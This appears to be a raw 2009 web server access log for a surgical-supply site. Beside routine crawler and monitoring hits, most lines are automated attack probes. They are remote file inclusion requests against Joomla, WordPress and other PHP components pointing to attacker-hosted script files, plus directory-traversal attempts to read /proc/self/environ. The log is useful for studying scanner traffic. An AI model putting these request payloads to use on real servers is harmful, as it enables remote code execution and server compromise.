88.238.86.212 - - [22/Jun/2009:03:44:36 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
88.238.86.212 - - [22/Jun/2009:03:44:36 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
217.160.79.161 - - [22/Jun/2009:03:45:04 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:45:04 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:45:04 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:45:19 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.136.251 - - [22/Jun/2009:03:45:29 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.38.136.251 - - [22/Jun/2009:03:45:29 -0400] "GET /logs//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
218.38.136.251 - - [22/Jun/2009:03:45:29 -0400] "GET //?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:45:57 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:46:01 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
68.109.233.157 - - [22/Jun/2009:03:46:08 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 6516 "-" "libwww-perl/5.79"
68.109.233.157 - - [22/Jun/2009:03:46:09 -0400] "GET /logs/access_log.Q109050800///?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
68.109.233.157 - - [22/Jun/2009:03:46:12 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
208.111.94.201 - - [22/Jun/2009:03:46:22 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:46:22 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:46:23 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:03:46:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.200.195.130 - - [22/Jun/2009:03:46:46 -0400] "GET /logs/access_log.Q109052100/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:46:52 -0400] "GET /logs/access_log.Q109051500/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:47:26 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
82.194.87.219 - - [22/Jun/2009:03:47:35 -0400] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 266 "-" "libwww-perl/5.822"
68.109.233.157 - - [22/Jun/2009:03:47:35 -0400] "GET /logs/access_log.Q109051300///?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
66.249.71.14 - - [22/Jun/2009:03:47:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L409D394E8E32D20030BF04Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.200.195.130 - - [22/Jun/2009:03:47:48 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:03:47:52 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309C144888621200E54F04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.200.195.130 - - [22/Jun/2009:03:47:57 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:03:48:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L409D394E8EA2B20037BF04Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [22/Jun/2009:03:48:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L409D394E8E82720031BF04Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.200.195.130 - - [22/Jun/2009:03:48:17 -0400] "GET /logs/access_log.Q109051500%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:48:18 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:03:48:22 -0400] "GET /logs/access_log.Q108062300 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.200.195.130 - - [22/Jun/2009:03:48:28 -0400] "GET /logs/access_log.Q109052900/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:50:02 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:03:50:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309C144889029200E54F04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.111.94.201 - - [22/Jun/2009:03:50:48 -0400] "GET /logs/error_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:03:51:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [22/Jun/2009:03:51:50 -0400] "GET /images/over-index16_xrayview.jpg HTTP/1.1" 200 2257 "-" "Googlebot-Image/1.0"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET /logs/error_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET /logs/error_log.Q109061000/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 266 "-" "XXXXXX"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 271 "-" "XXXXXX"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET /logs/error_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 292 "-" "XXXXXX"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 266 "-" "XXXXXX"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 271 "-" "XXXXXX"
62.149.163.198 - - [22/Jun/2009:03:52:43 -0400] "GET /logs/error_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "XXXXXX"
83.98.209.71 - - [22/Jun/2009:03:53:22 -0400] "GET /logs/access_log.Q109060300%20%20//rgboard/include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:03:53:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309C144888B24200E54F04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.129.166.10 - - [22/Jun/2009:03:54:26 -0400] "GET /logs//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
118.129.166.10 - - [22/Jun/2009:03:54:26 -0400] "GET //?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
118.129.166.10 - - [22/Jun/2009:03:54:26 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.149.163.198 - - [22/Jun/2009:03:54:49 -0400] "GET /logs/access_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 293 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
62.149.163.198 - - [22/Jun/2009:03:54:50 -0400] "GET /logs/access_log.Q109061000/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.149.163.198 - - [22/Jun/2009:03:54:50 -0400] "GET /logs/access_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-" "XXXXXX"
62.149.163.198 - - [22/Jun/2009:03:54:50 -0400] "GET /logs/access_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-" "XXXXXX"
118.129.166.10 - - [22/Jun/2009:03:54:59 -0400] "GET //?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
118.129.166.10 - - [22/Jun/2009:03:54:59 -0400] "GET /logs//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
118.129.166.10 - - [22/Jun/2009:03:54:59 -0400] "GET /logs/access_log.Q109051200%20%20//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
118.129.166.10 - - [22/Jun/2009:03:55:30 -0400] "GET /logs/access_log.Q109051200//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:03:56:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.14 - - [22/Jun/2009:03:56:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L106D4C469392C50077EF07C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.200.195.130 - - [22/Jun/2009:03:57:32 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:57:37 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.105.207.244 - - [22/Jun/2009:03:58:18 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.votaya.com//pics/site/image?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
66.249.71.14 - - [22/Jun/2009:03:58:25 -0400] "GET /images/search.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
83.103.72.130 - - [22/Jun/2009:03:58:51 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:03:58:51 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:03:58:51 -0400] "GET /logs/access_log.Q109051200%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:04:00:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L004A904F2502B600CEBE071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.49.99.7 - - [22/Jun/2009:04:00:22 -0400] "GET /index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:00:22 -0400] "GET /logs/index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:00:22 -0400] "GET /logs/access_log.Q109060400/index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:04:01:05 -0400] "GET ///vwar/backup/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:04:01:05 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:04:01:05 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:04:01:19 -0400] "GET ///vwar/backup/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:04:01:19 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:04:01:20 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.129.166.10 - - [22/Jun/2009:04:01:25 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
118.129.166.10 - - [22/Jun/2009:04:02:29 -0400] "GET /logs/error_log.Q109051400//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:02:29 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:02:29 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:02:29 -0400] "GET /logs/access_log.Q109060700%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:04:02:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.200.195.130 - - [22/Jun/2009:04:02:59 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:04:03:32 -0400] "GET /logs/access_log.Q109052900/convert/mvcw.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:04:03:46 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L106D4C4693B2A5007DEF07C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.49.99.7 - - [22/Jun/2009:04:03:49 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
82.194.87.219 - - [22/Jun/2009:04:04:57 -0400] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 266 "-" "libwww-perl/5.822"
66.249.71.14 - - [22/Jun/2009:04:07:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L106D4C469342950077EF07C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.49.99.7 - - [22/Jun/2009:04:08:04 -0400] "GET /logs/access_log.Q109060400%20%20/index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:04:08:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.53.70.114 - - [22/Jun/2009:04:09:38 -0400] "GET /logs///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:09:38 -0400] "GET ///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:09:41 -0400] "GET /logs/access_log.Q109061100///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:09:42 -0400] "GET /logs/access_log.Q109060300///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:10:19 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:10:29 -0400] "GET /logs/access_log.Q109041800//encapscms_PATH/core/core.php?root=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:10:29 -0400] "GET /logs//encapscms_PATH/core/core.php?root=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:10:29 -0400] "GET //encapscms_PATH/core/core.php?root=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:10:31 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:04:10:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309C144888D23200EB4F04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.125.100 - - [22/Jun/2009:04:10:56 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:04:10:56 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:04:10:56 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:04:11:16 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:04:11:30 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:04:12:03 -0400] "GET /logs/access_log.Q109050800//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:04:12:19 -0400] "GET /logs/access_log.Q109061800%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:04:12:40 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:13:21 -0400] "GET /logs/access_log.Q109061100%20%20///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:13:22 -0400] "GET /logs/access_log.Q109060300%20%20///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:04:13:27 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:04:13:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
